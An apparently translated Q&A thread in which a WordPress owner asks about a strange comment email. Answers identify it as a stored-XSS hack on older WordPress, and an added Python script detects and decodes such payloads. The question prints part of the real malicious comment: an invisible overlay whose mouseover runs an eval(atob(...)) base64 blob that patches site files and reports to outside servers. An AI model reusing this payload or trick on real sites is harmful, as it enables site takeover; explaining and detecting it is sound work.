Are the emails from my WordPress site a hack or just a normal comment?

25

I received an email for my WordPress site, on which the comments section is disabled.

This was the email:

"Author: google (IP: 210.56.50.40, 210.56.50.40)

Email: [email protected]

URL: link

Whois: link

Comment:

Welcome to WordPress. This is your first post.

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('[…]
 uY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiMTc2NGQxMzNkNzM1MWJmNmEyN2QyZGViM2M1MjFhMDIiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnY21WMGRYSnVJSFZ5YkdWdVkyOWtaU2hpWVhObE5qUmZaVzVqYjJSbEtINGtVM1J5YVc1bktTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tJQ0FnSUNSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OXljQzVqWkMxcmVYbDNZWFJsY2k1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1aWVXSjVMWE5vTlM1amIyMHZKenNLSUNBZ0lDUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTl5Y0M1MGFYUnBZVzVxWlhkbGJISjVMbU52YlM4bk93b2dJQ0FnSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzSndMblIxYlc5MWNtaGxZV3gwYUM1amIyMHZKenNLSUNBZ0lDUnla
 […]
 GaWJHVW9KR1p1WVcxbEtTbDdDaUFnSUNBZ0lDQWdKSEJsY20wZ1BTQnpkV0p6ZEhJb2MzQnlhVzUwWmlnbkpXOG5MQ0JtYVd4bGNHVnliWE1vSkdadVlXMWxLU2tzSUMwMEtUc0tJQ0FnSUNBZ0lDQkFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29nSUNBZ0lDQWdJQ1IzY21sMElEMGdkSEoxWlRzS0lDQWdJSDBLQ2lBZ0lDQmpiR1ZoY25OMFlYUmpZV05vWlNncE93b2dJQ0FnYVdZZ0tHbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29nSUNBZ0lDQWdJQ1IwYlhBZ1BTQkFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KR1p1WVcxbEtUc0tDaUFnSUNBZ0lDQWdKSEJ2Y3lBOUlITjBjbkJ2Y3lna2RHMXdMQ2N4TnpZMFpERXpNMlEzTXpVeFltWTJKeTRuWVRJM1pESmtaV0l6WXpVeU1XRXdNaWNwT3dvZ0lDQWdJQ0FnSUNSMGJYQWdQU0J6ZFdKemRISW9KSFJ0Y0N3a2NHOXpJQ3NnTXpJcE93b0tJQ0FnSUNBZ0lDQnBaaUFvYzNSeWJHVnVLQ1IwYlhBcElENGdNVEFwZXdvS0lDQWdJQ0FnSUNBZ0lDQWdKR1lnUFNCbWIzQmxiaWdrWm01aGJXVXNJbmNpS1RzS0lDQWdJQ0FnSUNBZ0lDQWdabkIxZEhNb0pHWXNKSFJ0Y0NrN0NpQWdJQ0FnSUNBZ0lDQWdJR1pqYkc5elpTZ2taaWs3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCamJHVmhjbk4wWVhSallXTm9aU2dwT3dvS0lDQWdJQ0FnSUNCcFppQW9KSGR5YVhRcGV3b2dJQ0FnSUNBZ0lDQWdJQ0JtYjNJb0pHazljM1J5YkdWdUtDUndaWEp0S1MweE95UnBQajB3
 […]
 dJQ0FnSUNCbWIzSW9KR2s5YzNSeWJHVnVLQ1J3WlhKdEtTMHhPeVJwUGowd095MHRKR2twZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQWdJQ0FnUUdOb2JXOWtLQ1JtYm1GdFpTd2tjR1Z5YlhNcE93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q2lBZ0lDQjlDZ29nSUNBZ1kyeGxZWEp6ZEdGMFkyRmphR1VvS1RzS0lDQWdJR2xtS0NSemFYcGxJQ0U5UFNCbWFXeGxjMmw2WlNna1ptNWhiV1VwS1hzS0lDQWdJQ0FnSUNCeVpYQnZjblFvSkhKalpDazdDaUFnSUNCOUNuMEtDbkpsYlc5MlpWOWpiMjF0Wlc1MEtDazdDbkJoZEdOb1gzZHdLQ2s3Q25ObGJHWmZjbVZ0YjNabEtDazdDZ28vUGdvdkx6RTNOalJrTVRNelpEY3pOVEZpWmpaaE1qZGtNbVJsWWpOak5USXhZVEF5IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9'))" &gt; --><a></a>]

Edit or delete it, then start blogging! "

What is this? I've already deleted the comment, but I'm curious.

posted by Joci93 24.04.2015 - 08:13
source

2 answers

32

The "code" is "patching" the WordPress installation (wp-comments-post.php) and sending some information to several servers (probably C&C). It also removes itself from the database.

In other words, it is a hack. The email you received is not from Google officially. It is from a Gmail account.

The decoded sources are here:

The exploit relies on the WordPress 3.x persistent script injection: link

answered 24.04.2015 - 08:47
source
16

This is a hacking attempt that contains a special combination of characters that hides the malicious payload code using Base64 encoding.

The hidden code relies on an older WordPress version being in use, for example version 3.5. In these older versions, tricks have been found. These tricks fool the protections that try to prevent scripts from being inserted into comments. It is done using a carefully crafted combination of characters that are misinterpreted as shortcodes, HTML and text in a way that gives access to the JavaScript mouseover event.

TIP: KEEP WORDPRESS UPDATED TO THE LATEST VERSION

When the mouseover is triggered by someone logged in as an administrator, any malicious code in the comment is executed as if the administrator had run it.

answered 24.04.2015 - 09:10
source
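Both answers describe the same structure: an `on*` event handler attribute that feeds a base64 string to `eval(atob(...))`, a huge transparent `position:fixed` element so that any mouse movement by a logged-in admin fires the handler, and a second base64 blob nested inside the decoded JavaScript. The following script is an added example, not code from either answer or from WordPress, showing how to triage a comment body for that pattern and peel the base64 layers off. The sample comment is constructed here with a harmless two-layer payload (it is not the real blob from the question, which is truncated in the post), and the overlay thresholds (1000px, `color:transparent`) are assumed heuristics.

```python
"""Triage a WordPress comment for a layered, base64-wrapped XSS payload."""
import base64
import binascii
import re

# on*="..." or on*='...' attributes; group 2 or 3 holds the handler source.
EVENT_HANDLER = re.compile(r"""\bon(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.I)
# atob('...') / atob("...") with a plain base64 literal inside.
ATOB_BLOB = re.compile(r"""atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
PX_SIZE = re.compile(r"(width|height)\s*:\s*(\d+)px", re.I)

# Constructed sample (not the payload from the post): JS layer that itself
# carries a base64-encoded PHP layer, mirroring the two-level nesting.
INNER_PHP = "<?php echo 'staged'; ?>"
INNER_B64 = base64.b64encode(INNER_PHP.encode()).decode()
OUTER_JS = f'var p = atob("{INNER_B64}"); alert(1);'
OUTER_B64 = base64.b64encode(OUTER_JS.encode()).decode()
SAMPLE_COMMENT = (
    "Welcome to WordPress. This is your first post. "
    "[<a title=\"]\" rel=\"nofollow\"></a>[\" <!-- style='position:fixed;"
    "top:0px;left:0px;width:6000px;height:6000px;color:transparent;"
    "z-index:999999999' onmouseover=\"eval(atob('" + OUTER_B64 + "'))\" > --><a></a>]"
)


def find_event_handlers(html):
    """Return [(event_name, handler_source)] for every on*= attribute."""
    return [
        (m.group(1).lower(), m.group(2) if m.group(2) is not None else m.group(3))
        for m in EVENT_HANDLER.finditer(html)
    ]


def decode_layers(source, max_depth=5):
    """Follow atob('...') nesting breadth-first; return each decoded layer in order."""
    layers = []
    frontier = [source]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for m in ATOB_BLOB.finditer(text):
                try:
                    decoded = base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    continue  # not valid base64: leave it, keep scanning
                layers.append(decoded)
                next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def is_clickjacking_overlay(html):
    """Heuristic: a fixed, very large, invisible element that catches the pointer anywhere."""
    fixed = re.search(r"position\s*:\s*fixed", html, re.I) is not None
    huge = any(int(v) >= 1000 for _, v in PX_SIZE.findall(html))  # assumed threshold
    hidden = re.search(r"color\s*:\s*transparent|opacity\s*:\s*0", html, re.I) is not None
    return fixed and huge and hidden


def triage_comment(html):
    """Summarise the indicators and give a verdict for one comment body."""
    handlers = find_event_handlers(html)
    payloads = []
    for _, src in handlers:
        payloads.extend(decode_layers(src))
    verdict = {
        "event_handlers": [name for name, _ in handlers],
        "eval_atob": any("eval" in src and "atob" in src for _, src in handlers),
        "overlay": is_clickjacking_overlay(html),
        "decoded_layers": payloads,
    }
    verdict["malicious"] = bool(handlers) and (verdict["eval_atob"] or verdict["overlay"])
    return verdict


if __name__ == "__main__":
    result = triage_comment(SAMPLE_COMMENT)
    print("malicious:", result["malicious"], "handlers:", result["event_handlers"])
    for i, layer in enumerate(result["decoded_layers"], 1):
        print(f"layer {i}: {layer}")
```

A comment on a site with comments disabled should never reach the admin's notification email at all; if one does, running the body through something like this before opening it in the dashboard avoids the mouseover trigger the second answer describes. The real payload in the question decodes the same way: the outer `atob` yields JavaScript, and a second `atob` inside that yields the PHP that gets written through the admin's session.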
